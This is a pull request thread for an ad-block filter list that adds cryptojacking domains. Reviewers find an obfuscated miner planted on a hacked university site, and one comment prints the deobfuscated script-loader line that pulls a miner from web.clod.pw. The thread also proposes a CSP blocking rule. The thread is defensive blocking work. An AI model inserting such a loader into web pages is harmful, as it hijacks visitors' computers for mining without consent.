### PR TITLE
Added "minr.pw" and it's mirrors

### PR DESCRIPTION
**Pull request by SMed79**

### CODE REVIEW

**Comment by mapx-** [comment]
Did you get all that stuff on gearslutz site ? I get nothing like this

**Comment by SMed79** [comment]
`cdn.jquery-uim.download` ==> http://i.imgur.com/F2VpOwF.png

Other JS mirros domains from `http://minr.pw/` ==> https://pastebin.com/raw/wRypmR3q

**Comment by mapx-** [comment]
nothing on that site
however I found it on other website
`https://foundation.uwinnipeg.ca/`

**Comment by okiehsch** [comment]
I am pretty sure these sites were hacked, I mean look at the source code of 
`https://foundation.uwinnipeg.ca/`
unbenannt

Note that the obfuscated script triggering the miner via  `web.clod.pw` has been embedded above the 
the DOCTYPE-declaration and this is not some "warez" site, were one would expect such a thing.

**Comment by mapx-** [comment]
yeah, some "student" probably hacked them :)

I got it from:
https://twitter.com/search?q=%23cryptojacking

**Comment by mapx-** [comment]
deobfuscating that code:

`document.createElement('script');el.src='https://web.clod.pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.30';document.head.appendChild(el);`

**Comment by okiehsch** [comment]
Maybe we could add
`||foundation.uwinnipeg.ca^$csp=child-src 'none';frame-src 'self' *;worker-src 'none';`
in case they change their mining script, atleast until the site  has benn cleaned up.

**Pull request merged**
